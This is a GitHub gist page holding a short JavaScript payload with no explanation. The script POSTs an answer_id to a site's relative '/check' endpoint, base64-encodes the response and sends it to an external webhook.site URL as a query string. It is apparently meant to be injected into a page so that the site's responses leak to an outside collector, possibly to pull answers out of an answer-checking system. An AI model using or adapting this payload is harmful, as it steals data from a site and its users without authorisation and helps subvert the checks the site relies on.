Skip to content

Instantly share code, notes, and snippets.

@tnightingale
Last active June 25, 2025 17:28
Show Gist options
  • Save tnightingale/d11011e11cb022b900700dfea3523e05 to your computer and use it in GitHub Desktop.
Save tnightingale/d11011e11cb022b900700dfea3523e05 to your computer and use it in GitHub Desktop.
fetch("/check", {
method: "POST",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
body: "answer_id=f1eec86c-eb2c-483b-9b6e-c936e122b050"
})
.then(r => r.text())
.then(t => fetch("https://webhook.site/343d91a5-4ebb-428a-94b5-8f9d244196cf?data=" + btoa(t)));
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment